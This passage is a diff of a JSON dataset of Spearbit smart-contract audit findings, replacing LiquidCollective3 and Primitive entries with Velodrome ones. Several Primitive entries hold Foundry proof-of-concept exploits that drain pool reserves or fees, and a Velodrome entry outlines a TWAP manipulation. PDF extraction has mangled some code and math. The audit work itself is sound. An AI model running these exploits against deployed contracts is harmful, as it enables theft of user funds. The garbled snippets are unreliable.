"RedeemManager. _claimRedeemRequests - Consider adding the recipient to the revert message in case of failure", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The purpose of the _claimRedeemRequests function is to facilitate the claiming of ETH on behalf of another party who has a valid redeem request. It is worth noting that if any of the calls to recipients fail, the entire transaction will revert. Although it is impossible to conduct a denial-of-service (DoS) attack in this scenario, as the worst-case scenario only allows the transaction sender to specify a different array of redeemRequestIds, it may still be challenging to determine the specific redemption request that caused the transaction to fail.", + "title": "Missing nonReentrant modifier on a state changing checkpoint function", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The checkpoint() function will call the internal _checkpoint() function which ultimately fills the point history and potentially updates the epoch state variable.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Exit validator picking strategy does not consider slashed validator between reported epoch and current epoch", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The current picking strategy in the OperatorsRegistry._pickNextValidatorsToExitFromActive- Operators function relies on a report from an old epoch. In between the reported epoch and the current epoch, validators might have been slashed and so the strategy might pick and signal to the operators those validators that have been slashed. As a result, the suggested number of validators to exit the protocol to compensate for the redemption demand in the next round of reports might not be exactly what was requested. Similarly, the OperatorsV2._hasExitableKeys function only evaluates based on a report from an old epoch. In between the reported epoch and the current epoch, validators might have been slashed. Thus, some returned operators might not have exitable keys in the current epoch.", + "title": "Close to half of the trading fees may be paid one epoch late", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Due to how left() is implemented in Reward (returning the total amount of rewards for the epoch), _claimFees() will not queue rewards until the new fees are greater than the current ones for the epoch. This can cause the check to be false for values that are up to half minus one reward. Consider the following example: First second of a new epoch, we add 100 rewards. For the rest of the epoch, we accrue 99.99 rewards. The check is always false, the 99 rewards will not be added to this epoch, despite having accrued them during this epoch.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Duplicated functions", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "_getStoppedValidatorsCountFromRawArray functions are the same. Operator.2._getStoppedValidatorCountAtIndex The and OperatorsRegistry.1. 30 function _getStoppedValidatorCountAtIndex(uint32[] storage stoppedValidatorCounts, uint256 if (index + 1 >= stoppedValidatorCounts.length) { return 0; } return stoppedValidatorCounts[index + 1]; function _getStoppedValidatorsCountFromRawArray(uint32[] storage stoppedValidatorCounts, internal view returns (uint32) index) File: Operators.2.sol 142: ,! 143: 144: 145: 146: 147: 148: 149: 150: 151: } { uint256 operatorIndex) internal view returns (uint32) File: OperatorsRegistry.1.sol 484: ,! 485: 486: 487: 488: 489: 490: 491: 492: 493: return 0; } { if (operatorIndex + 1 >= stoppedValidatorCounts.length) { } return stoppedValidatorCounts[operatorIndex + 1];", + "title": "Not synced with Epochs", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "If there's enough delays in calling the notifyRewardAmount() function, a full desync can happen.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Funds might be pulled from CoverageFundV1 even when there has been no slashing incident.", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "vars.availableAmountToUpperBound might be positive even though no validators have been slashed. In this case, we still pull funds from the coverage funds contract to get closer to the upper bound limit: // if we have available amount to upper bound after pulling the exceeding eth buffer, we attempt to pull coverage funds ,! if (vars.availableAmountToUpperBound > 0) { // we pull the funds from the coverage recipient vars.trace.pulledCoverageFunds = _pullCoverageFunds(vars.availableAmountToUpperBound); // we do not update the rewards as coverage is not considered rewards // we do not update the available amount as there are no more pulling actions to perform afterwards } So it is possible the slashed coverage funds get used even when there has been no slashing to account for.", + "title": "Dust losses in notifyRewardAmount", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "This should cause dust losses which are marginal but are never queued back. See private link to code-423n4/2022-10-3xcalibur-findings#410. Vs SNX implementation which does queue the dust back. Users may be diluted by distributing the _leftover amount of another epoch period of length DURATION if the total supply deposited in the gauge continues to increase over this same period. On the flip side, they may also benefit if users withdraw funds from the gauge during the same epoch.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Update inline documentation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": " OracleManager.1.sol functions highlighted in Context are missing the @return natspec. IOracle.1.sol#L204's highlighted comment is outdated. setMember can now also be called by the member itself. Also, there is a typo: adminitrator -> administrator. File: IOracle.1.sol 204: 209: /// @dev Only callable by the adminitrator @audit typo and outdated function setMember(address _oracleMember, address _newAddress) external; modifier onlyAdminOrMember(address _oracleMember) { if (msg.sender != _getAdmin() && msg.sender != _oracleMember) { revert LibErrors.Unauthorized(msg.sender); File: Oracle.1.sol 28: 29: 30: 31: 32: 33: ... 189: ,! } _; } function setMember(address _oracleMember, address _newAddress) external onlyAdminOrMember(_oracleMember) {", + "title": "All rewards are lost until Gauge or Bribe deposits are non-zero", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Flagging this old finding which is still valid for all SNX like gauges. See private link to code- 423n4/2022-10-3xcalibur-findings#429. Because the rewards are emitted over DURATION, if no deposit has happened and notifyRewardAmount() is called with a non-zero value, all rewards will be forfeited until totalSupply is non-zero as nobody will be able to claim them.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Document/mark unused (would-be-stale) storage parameters after migration", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "The following storage parameters will be unused after the migration of the protocol to v1 CLValidatorCount CLValidatorTotalBalance LastOracleRoundId.sol OperatorsV1, this will be more than one slot (it occupies regions of storage) ReportVariants, the slot has been changed (that means right after migration ReportVariants will be an empty array by default): bytes32(uint256(keccak256(\"river.state.reportsVariants\")) - 1); - bytes32 internal constant REPORTS_VARIANTS_SLOT = ,! + bytes32 internal constant REPORT_VARIANTS_SLOT ,! = bytes32(uint256(keccak256(\"river.state.reportVariants\")) - 1);", + "title": "Difference in getPastTotalSupply and propose", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The getPastTotalSupply() function currently uses block.number, but OpenZeppelin's propose() function will use votes from block.timestamp - 1 as seen here. This could enable Front-run and increase total supply to cause proposer to be unable to propose(). Require higher tokens than expected if total supply can grow within one block. Proposals could be denied as long as a whale is willing to lock more tokens to increase the total supply and thereby increase the proposal threshold.", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "pullEth, pullELFees and pullExceedingEth do not check for a non-zero amount before sending funds to River", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/LiquidCollective3-Spearbit-Security-Review.pdf", - "body": "pullCoverageFunds makes sure that the amount sending to River is non-zero before calling its corresponding endpoint. This behavior differs from the implementations of pullELFees pullExceedingEth pullEth 33 Not checking for a non-zero value has the added benefit of saving gas when the value is non-zero, while the check for a non-zero value before calling back River saves gas for cases when the amount could be 0.", + "title": "Delaying update_period may award more emissions", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "First nudge can be performed on the first tail period, delaying update_period() may award more emissions, because of the possible delay with the first proposal, waiting to call update_period() will allow the use of the updated nudged value. This is marginal (1BPS in difference)", "labels": [ "Spearbit", - "LiquidCollective3", - "Severity: Informational" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Protocol fees are double-counted as registry balance and pool reserve", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "When swapping, the registry is credited a protocolFee. However, this fee is always reinvested in the pool, meaning the virtualX or virtualY pool reserves per liquidity increase by protocolFee / liquidity. The protocol fee is now double-counted as the registrys user balance and the pool reserve, while the global reserves are only increased by the protocol fee once in _increaseReserves(_state.tokenInput, iteration.input). A protocol fee breaks the invariant that the global reserve should be greater than the sum of user balances and fees plus the sum of pool reserves. As the protocol fee is reinvested, LPs can withdraw them. If users and LPs decide to withdraw all their balances, the registry cant withdraw their fees anymore. Conversely, if the registry withdraws the protocol fee, not all users can withdraw their balances anymore. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { function test_protocol_fee_reinvestment() public noJit defaultConfig useActor usePairTokens(100e18) allocateSome(10e18) // deltaLiquidity isArmed { // Set fee, 1/5 = 20% SimpleRegistry(subjects().registry).setFee(address(subject()), 5); // swap // make invariant go negative s.t. all fees are reinvested, not strictly necessary vm.warp(block.timestamp + 1 days); uint128 amtIn = 1e18; bool sellAsset = true; uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); subject().multiprocess(FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, ,! uint8(sellAsset ? 1 : 0))); // deallocate and earn reinvested LP fees + protocol fees, emptying _entire_ reserve including protocol fees ,! subject().multiprocess( FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: false, useMax: uint8(1), poolId: ghost().poolId, deltaLiquidity: 0 // useMax will set this to freeLiquidity }) ); subject().draw(ghost().asset().to_addr(), type(uint256).max, actor()); uint256 protocol_fee = ghost().balance(subjects().registry, ghost().asset().to_addr()); 5 assertEq(protocol_fee, amtIn / 100 / 5); // 20% of 1% of 1e18 // the global reserve is 0 even though the protocol fee should still exist uint256 reserve_asset = ghost().reserve(ghost().asset().to_addr()); assertEq(reserve_asset, 0); // reverts with InsufficientReserve(0, 2000000000000000) SimpleRegistry(subjects().registry).claimFee( address(subject()), ghost().asset().to_addr(), protocol_fee, address(this) ); } }", + "title": "Incorrect math for future factories and pools", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Because quoteLiquidity() assumes an x * y = k formula, its quote value will be incorrect when using a custom factory that uses a different curve. //Router.sol#L673-L700 function _quoteZapLiquidity( address tokenA, address tokenB, bool stable, address _factory, uint256 amountADesired, uint256 amountBDesired, uint256 amountAMin, uint256 amountBMin ) internal view returns (uint256 amountA, uint256 amountB) { require(amountADesired >= amountAMin); require(amountBDesired >= amountBMin); (uint256 reserveA, uint256 reserveB) = getReserves(tokenA, tokenB, stable, _factory); if (reserveA == 0 && reserveB == 0) { (amountA, amountB) = (amountADesired, amountBDesired); } else { uint256 amountBOptimal = quoteLiquidity(amountADesired, reserveA, reserveB); if (amountBOptimal <= amountBDesired) { require(amountBOptimal >= amountBMin, \"Router: insufficient B amount\"); (amountA, amountB) = (amountADesired, amountBOptimal); } else { uint256 amountAOptimal = quoteLiquidity(amountBDesired, reserveB, reserveA); assert(amountAOptimal <= amountADesired); require(amountAOptimal >= amountAMin, \"Router: insufficient A amount\"); (amountA, amountB) = (amountAOptimal, amountBDesired); } } } The math may be incorrect for future factories and pools, while the current math is valid for x * y = k, any new AMM math (e.g Bounded / V3 math, Curve V2, Oracle driven AMMs) may turn out to be incorrect. This may cause issues when performing zaps with custom factories.", "labels": [ "Spearbit", - "Primitive", - "Severity: Critical Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "LP fees are in WAD instead of token decimal units", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "When swapping, deltaInput is in WAD (not token decimals) units. Therefore, feeAmount is also in WAD as a percentage of deltaInput. When calling _feeSavingEffects(args.poolId, iteration) to determine whether to reinvest the fees in the pool or earmark them for LPs, a _syncFeeGrowthAccumulator is done with the following parameter: _syncFeeGrowthAccumulator(FixedPointMathLib.divWadDown(iteration.feeAmount, iteration.liquidity)) This is a WAD per liquidity value stored in _state.feeGrowthGlobal and also in pool.feeGrowthGlobalAsset through a subsequent _syncPool call. If an LP claims now and their fees are synced with syncPositionFees, their tokensOwed is set to: uint256 differenceAsset = AssemblyLib.computeCheckpointDistance( feeGrowthAsset=pool.feeGrowthGlobalAsset, self.feeGrowthAssetLast ); feeAssetEarned = FixedPointMathLib.mulWadDown(differenceAsset, self.freeLiquidity); self.tokensOwedAsset += SafeCastLib.safeCastTo128(feeAssetEarned); Then tokensOwedAsset is increased by a WAD value (WAD per WAD liquidity multiplied by WAD liquidity) and they have credited this WAD value with _applyCredit(msg.sender, asset, claimedAssets) which they can then withdraw as a token decimal value. The result is that LP fees are credited and can be withdrawn as WAD units and tokens with fewer than 18 decimals can be stolen from the protocol. 6 // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { function test_fee_decimal_bug() public sixDecimalQuoteConfig useActor usePairTokens(31e18) allocateSome(100e18) // deltaLiquidity isArmed { // Understand current pool values. create pair initializes from price // DEFAULT_STRIKE=10e18 = 10.0 quote per asset = 1e7/1e18 = 1e-11 uint256 reserve_asset = ghost().reserve(ghost().asset().to_addr()); uint256 reserve_quote = ghost().reserve(ghost().quote().to_addr()); assertEq(reserve_asset, 30.859596948332370800e18); assertEq(reserve_quote, 308.595965e6); // Do swap from quote -> asset, so we catch fee on quote bool sellAsset = false; // amtIn is in quote. gets scaled to WAD in `_swap`. uint128 amtIn = 100; // 0.0001$ ~ 1e14 iteration.input uint128 amtOut = uint128(subject().getAmountOut(ghost().poolId, sellAsset, amtIn)); { } // verify that before swap, we have no credit uint256 credited = ghost().balance(actor(), ghost().quote().to_addr()); assertEq(credited, 0, \"token-credit\"); uint256 pre_swap_balance = ghost().quote().to_token().balanceOf(actor()); subject().multiprocess( FVMLib.encodeSwap( uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0) ) ); subject().multiprocess( // claim it all FVMLib.encodeClaim(ghost().poolId, type(uint128).max, type(uint128).max) ); // we got credited tokensOwed = 1% of 1e14 input = 1e12 quote tokens uint256 credited = ghost().balance(actor(), ghost().quote().to_addr()); assertEq(credited, 1e12, \"tokens-owed\"); // can withdraw the credited tokens, would underflow reserve, so just rug the entire reserve reserve_quote = ghost().reserve(ghost().quote().to_addr()); subject().draw(ghost().quote().to_addr(), reserve_quote, actor()); uint256 post_draw_balance = ghost().quote().to_token().balanceOf(actor()); // -amtIn because reserve_quote already got increased by it, otherwise we'd be double-counting assertEq(post_draw_balance, pre_swap_balance + reserve_quote - amtIn, ,! \"post-draw-balance-mismatch\"); 7 } }", + "title": "Add function to remove whitelisted token and NFT", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "In the Voter contract, the governor can only add tokens and NFTs to the whitelist array. However, it is missing the functionality to remove whitelisted tokens and NFTs. If any whitelisted token or NFT has an issue, it cannot be removed from the list.", "labels": [ "Spearbit", - "Primitive", - "Severity: Critical Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Swaps can be done for free and steal the reserve given large liquidity allocation", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "A swap of inputDelta tokens for outputDelta tokens is accepted if the invariant after the swap did not decrease. The after-swap invariant is recomputed using the pools new virtual reserves (per liquidity) virtualX and virtualY: // becomes virtualX (reserveX) if swapping X -> Y nextIndependent = liveIndependent + deltaInput.divWadDown(iteration.liquidity); // becomes virtualY (reserveY) if swapping X -> Y nextDependent = liveDependent - deltaOutput.divWadDown(iteration.liquidity); // in checkInvariant int256 nextInvariant = RMM01Lib.invariantOf({ self: pools[poolId], R_x: reserveX, R_y: reserveY, timeRemainingSec: tau }); require(nextInvariantWad >= prevInvariant); When iteration.liquidity is sufficiently large the integer division deltaOutput.divWadDown(iteration.liquidity) will return 0, resulting in an unchanged pool reserve instead of a decreased one. The invariant check will pass even without transferring any input amount deltaInput as the reserves are unchanged. The swapper will be credited deltaOutput tokens. The attacker needs to first increase the liquidity to a large amount (>2**126 in the POC) such that they can steal the entire asset reserve (100e18 asset tokens in the POC): This can be done using multiprocess to: 1. allocate > 1.1e38 liquidity. 2. swap with input = 1 (to avoid the 0-swap revert) and output = 100e18. The new virtualX asset will be liveDependent - deltaOutput.divWadDown(iteration.liquidity) = liveDependent computed - 100e18 * 1e18 / 1.1e38 = liveDependent - 0 = liveDependent, leaving the virtual pool reserves unchanged and passing the invariant check. This credits 100e18 to the attacker when settled, as the global reserves (__account__.reserve) are decreased (but not the actual contract balance). as 3. deallocate the > 1.1e38 free liquidity again. As the virtual pool reserves virtualX/Y remained unchanged throughout the swap, the same allocated amount is credited again. Therefore, the allocation / deallocation doesnt require any token settlement. 4. settlement is called and the attacker needs to pay the swap input amount of 1 wei and is credited the global reserve decrease of 100e18 assets from the swap. Note that this attack requires a JIT parameter of zero in order to deallocate in the same block as the allocation. However, given sufficient capital combined with an extreme strike price or future cross-block flashloans, this attack 8 is also possible with JIT > 0. Attackers can perform this attack in their own pool with one malicious token and one token they want to steal. The malicious token comes with functionality to disable anyone else from trading so the attacker is the only one who can interact with their custom pool. This reduces any risk of this attack while waiting for the deallocation in a future block. // SPDX-License-Identifier: GPL-3.0-only pragma solidity ^0.8.4; import \"./Setup.sol\"; import \"contracts/libraries/RMM01Lib.sol\"; import \"forge-std/console2.sol\"; contract TestSpearbit is Setup { using RMM01Lib for PortfolioPool; // sorry, didn't know how to use the modifiers for testing 2 actors at the same time function test_virtual_reserve_unchanged_bug() public noJit defaultConfig { /////// SETUP /////// uint256 initialBalance = 100 * 1e18; address victim = address(actor()); vm.startPrank(victim); // we want to steal the victim's asset ghost().asset().prepare(address(victim), address(subject()), initialBalance); subject().fund(ghost().asset().to_addr(), initialBalance); vm.stopPrank(); // we need to prepare a tiny quote balance for attacker because we cannot set input = 0 for a swap ,! address attacker = address(0x54321); addGhostActor(attacker); setGhostActor(attacker); vm.startPrank(attacker); ghost().quote().prepare(address(attacker), address(subject()), 2); vm.stopPrank(); uint256 maxVirtual; { // get the virtualX/Y from pool creation PortfolioPool memory pool = ghost().pool(); (uint256 x, uint256 y) = pool.getVirtualPoolReservesPerLiquidityInWad(); console2.log(\"getVirtualPoolReservesPerLiquidityInWad: %s \\t %y \\t %s\", x, y); maxVirtual = y; } /////// ATTACK /////// // attacker provides max liquidity, swaps for free, removes liquidity, is credited funds vm.startPrank(attacker); bool sellAsset = false; uint128 amtIn = 1; uint128 amtOut = uint128(initialBalance); // victim's funds bytes[] memory instructions = new bytes[](3); uint8 counter = 0; instructions[counter++] = FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: true, useMax: uint8(0), poolId: ghost().poolId, // getPoolLiquidityDeltas(int128 deltaLiquidity) does virtualY.mulDivUp(delta, scaleDownFactorAsset).safeCastTo128() ,! // virtualY * deltaLiquidity / 1e18 <= uint128.max => deltaLiquidity <= uint128.max * 1e18 ,! / virtualY. 9 // this will end up supplying deltaLiquidity such that the uint128 cast on deltaQuote won't overflow (deltaQuote ~ uint128.max) ,! // deltaLiquidity = 110267925102637245726655874254617279807 > 2**126 deltaLiquidity: uint128((uint256(type(uint128).max) * 1e18) / maxVirtual) }); // the main issue is that the invariant doesn't change, so the checkInvariant passes // the reason why the invariant doesn't change is because the virtualX/Y doesn't change // the reason why virtualY doesn't change even though we have deltaOutput = initialBalance (100e18) ,! // is that the previous allocate increased the liquidity so much that: // nextDependent = liveDependent - deltaOutput.divWadDown(iteration.liquidity) = liveDependent // the deltaOutput.divWadDown(iteration.liquidity) is 0 because: // 100e18 * 1e18 / 110267925102637245726655874254617279807 = 1e38 / 1.1e38 = 0 instructions[counter++] = FVMLib.encodeSwap(uint8(0), ghost().poolId, amtIn, amtOut, uint8(sellAsset ? 1 : 0)); ,! instructions[counter++] = FVMLib.encodeAllocateOrDeallocate({ shouldAllocate: false, useMax: uint8(1), poolId: ghost().poolId, deltaLiquidity: 0 // useMax makes us deallocate our entire freeLiquidity }); subject().multiprocess(FVM.encodeJumpInstruction(instructions)); uint256 attacker_asset_balance = ghost().balance(attacker, ghost().asset().to_addr()); assertGt(attacker_asset_balance, 0); console2.log(\"attacker asset profit: %s\", attacker_asset_balance); // attacker can withdraw victim's funds, leaving victim unable to withdraw subject().draw(ghost().asset().to_addr(), type(uint256).max, actor()); uint256 attacker_balance = ghost().asset().to_token().balanceOf(actor()); // rounding error of 1 assertEq(attacker_balance, initialBalance - 1, \"attacker-post-draw-balance-mismatch\"); vm.stopPrank(); } }", + "title": "Unnecessary approve in Router", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The newly added Zap feature uses max approvals, which are granted to pairs. However, the Pair contract does not pull tokens from the router, and therefore unnecessarily calls approve() in the router. Because of the possibility of specifying a custom factory, attackers will be able to set up approvals from any token to their contracts. This may be used to scam end-users, for example by performing a swap on these malicious factories.", "labels": [ "Spearbit", - "Primitive", - "Severity: Critical Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Unsafe type-casting", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "Throughout the contract weve encountered various unsafe type-castings. invariant Within the _swap function, the next invariant is a int256 variable and is calculated within the checkInvariant function implemented in the RMM01Portfolio. This variable then is dangerously typecasted to int128 and assigned to a int256 variable in the iteration struct (L539). The down-casting from int256 to int128 assumes that the nextInvariantWad fits in a int128, in case it wont fit, it will overflow. The updated iteration object is passed to the _feeSavingEffects function, which based on the RMM implementation can lead to bad consequences. iteration.nextInvariant _getLatestInvariantAndVirtualPrice getNetBalance During account settlement, getNetBalance is called to compute the difference between the \"physical reserves\" (contract balance) and the internal reserves: net = int256(physicalBalance) - int256(internalBalance). If the internalBalance > int256.max, it overflows into a negative value and the attacker is credited the entire physical balance + overflow upon settlement (and doesnt have to pay anything in settle). This might happen if an attacker allocates or swaps in very high amounts before settlement is called. Consider doing a safe typecast here as a legitimate possible revert would cause less issues than an actual overflow. getNetBalance 11 Encoding / Decoding functions The encoding and decoding functions in FVMLib perform many unsafe typecasts and will truncate values. This can result in a user calling functions with unexpected parameters if they use a custom encoding. Consider using safe type-casts here. encodeJumpInstruction: cannot encode more than 255 instructions, instructions will be cut off and they might perform an action that will then be settled unfavorably. decodeClaim: fee0/fee1 can overflow decodeCreatePool: price := mul(base1, exp(10, power1)) can overflow and pool is initialized wrong decodeAllocateOrDeallocate: deltaLiquidity := mul(base, exp(10, power)) can overflow would pro- vide less liquidity decodeSwap: input / output := mul(base1, exp(10, power1)) can overflow, potentially lead to unfavor- able swaps Other PortfolioLib.getPoolReserves: int128(self.liquidity). This could be a safe typecast, the function is not used internally. AssemblyLib.toAmount: The typecast works if power < 39, otherwise leads to wrong results without revert- ing. This function is not used yet but consider performing a safe typecast here.", + "title": "The current value of a Pair is not always returning a 30-minute TWAP and can be manipulated.", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The current function returns a current TWAP. It fetches the last observation and calculates the TWAP between the last observation. The observation is pushed every thirty minutes. However, the interval between current timestamp and the last observation varies a lot. In most cases, the TWAP interval is shorter than 30 minutes. //Pair.sol#L284-L288 uint256 timeElapsed = block.timestamp - _observation.timestamp; @audit: timeElapsed can be much smaller than 30 minutes. uint256 _reserve0 = (reserve0Cumulative - _observation.reserve0Cumulative) / timeElapsed; uint256 _reserve1 = (reserve1Cumulative - _observation.reserve1Cumulative) / timeElapsed; amountOut = _getAmountOut(amountIn, tokenIn, _reserve0, _reserve1); If the last observation is newly updated, the timeElapsed will be much shorter than 30 minutes. The cost of price manipulation is cheaper in this case. Assume the last observation is updated at T. The exploiter can launch an attack at T + 30_MINUTES - 1 1. At T + 30_MINUTES - 1, the exploiter tries to manipulate the price of the pair. Assume the price is moved to 100x. 2. At T + 30_MINUTES, the exploiter pokes the pair. The pair push an observation with the price = 100x. 3. At T + 30_MINUTES + 1, the exploiter tries to exploit external protocols. The current function fetches the It ends up last observation and calculates the TWAP between the last observation and the current price. calculating the two-block-interval TWAP.", "labels": [ "Spearbit", - "Primitive", - "Severity: High Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Protocol fees are in WAD instead of token decimal units", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "When swapping, deltaInput is in WAD (not token decimals) units. Therefore, the protocolFee will also be in WAD as a percentage of deltaInput. This WAD amount is then credited to the REGISTRY: iteration.feeAmount = (deltaInput * _state.fee) / PERCENTAGE; if (_protocolFee != 0) { uint256 protocolFeeAmount = iteration.feeAmount / _protocolFee; iteration.feeAmount -= protocolFeeAmount; _applyCredit(REGISTRY, _state.tokenInput, protocolFeeAmount); } The privileged registry can claim these fees using a withdrawal (draw) and the WAD units are not scaled back to token decimal units, resulting in withdrawing more fees than they should have received if the token has less than 18 decimals. This will reduce the global reserve by the increased fee amount and break the accounting and functionality of all pools using the token.", + "title": "Calculation error of getAmountOut leads to revert of Router", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "The function getAmountOut in Pair calculates the correct swap amount and token price. //Pair.sol#L442-L444 function _f(uint256 x0, uint256 y) internal pure returns (uint256) { return (x0 * ((((y * y) / 1e18) * y) / 1e18)) / 1e18 + (((((x0 * x0) / 1e18) * x0) / 1e18) * y) / ,! 1e18; } //Pair.sol#L450-L476 function _get_y( uint256 x0, uint256 xy, uint256 y ) internal pure returns (uint256) { for (uint256 i = 0; i < 255; i++) { uint256 y_prev = y; uint256 k = _f(x0, y); if (k < xy) { uint256 dy = ((xy - k) * 1e18) / _d(x0, y); y = y + dy; } else { uint256 dy = ((k - xy) * 1e18) / _d(x0, y); y = y - dy; } if (y > y_prev) { if (y - y_prev <= 1) { return y; } } else { if (y_prev - y <= 1) { return y; } } } return y; } The getAmountOut is not always correct. This results in the router unexpectedly revert a regular and correct transaction. We can find one parameter that the router will fail to swap within 5s fuzzing. 36 function testAmountOut(uint swapAmount) public { vm.assume(swapAmount < 1_000_000_000 ether); vm.assume(swapAmount > 1_000_000); uint256 reserve0 = 100 ether; uint256 reserve1 = 100 ether; uint amountIn = swapAmount - swapAmount * 2 / 10000; uint256 amountOut = _getAmountOut(amountIn, token0, reserve0, reserve1); uint initialK = _k(reserve0, reserve1); reserve0 += amountIn; reserve1 -= amountOut; console.log(\"initial k:\", initialK); console.log(\"curent k:\", _k(reserve0, reserve1)); console.log(\"curent smaller k:\", _k(reserve0, reserve1 - 1)); require(initialK < _k(reserve0, reserve1), \"K\"); require(initialK > _k(reserve0, reserve1-1), \"K\"); } After the fuzzer have a counter example of swapAmount = 1413611527073436 We can test that the Router will revert if given the fuzzed params. contract PairTest is BaseTest { function testRouterSwapFail() public { Pair pair = Pair(factory.createPair(address(DAI), address(FRAX), true)); DAI.approve(address(router), 100 ether); FRAX.approve(address(router), 100 ether); _addLiquidityToPool( address(this), address(router), address(DAI), address(FRAX), true, 100 ether, 100 ether ); uint swapAmount = 1413611527073436; DAI.approve(address(router), swapAmount); // vm.expectRevert(); console.log(\"fee:\", factory.getFee(address(pair), true)); IRouter.Route[] memory routes = new IRouter.Route[](1); routes[0] = IRouter.Route(address(DAI), address(FRAX), true, address(0)); uint daiAmount = DAI.balanceOf(address(pair)); uint FRAXAmount = FRAX.balanceOf(address(pair)); console.log(\"daiAmount: \", daiAmount, \"FRAXAmount: \", FRAXAmount); vm.expectRevert(\"Pair: K\"); router.swapExactTokensForTokens(swapAmount, 0, routes, address(owner), block.timestamp); } }", "labels": [ "Spearbit", - "Primitive", - "Severity: High Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - "title": "Invariant.getX computation is wrong", - "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Primitive-Spearbit-Security-Review.pdf", - "body": "The protocol makes use of a solstat library to compute the off-chain swap amounts. The solstats Invariant.getX function documentation states: Computes x in x = 1 - (( (y + k) / K ) + ). However, the y + k term should be y - k. The off-chain swap amounts computed via getAmountOut return wrong values. Using these values for an actual swap transaction will either (wrongly) revert the swap or overstate the output amounts. Derivation: y = K (cid:8) (cid:0)(cid:8)(cid:0)1(1 (cid:8)(cid:0)1(y (cid:0) (cid:8) (cid:0)(cid:8)(cid:0)1(y x) (cid:27)p(cid:28) (cid:1) + k (cid:0) (cid:0) k )=K = (cid:8)(cid:0)1(1 x) (cid:27)p(cid:28) (cid:0) k)=K + (cid:27)p(cid:28) (cid:1) = 1 (cid:0) x (cid:0) (cid:0) (cid:8) (cid:0)(cid:8)(cid:0)1(y x = 1", + "title": "VotingEscrow checkpoints is not synchronized", + "html_url": "https://github.com/spearbit/portfolio/tree/master/pdfs/Velodrome-Spearbit-Security-Review.pdf", + "body": "Delegating token ids is not synchronizing correctly fromBlock variable in the checkpoint, by leaving it not updated the functions getPastVotesIndex and _findWhatCheckpointToWrite could return the incorrect index.", "labels": [ "Spearbit", - "Primitive", - "Severity: High Risk" + "Velodrome", + "Severity: Low Risk" ] }, { - 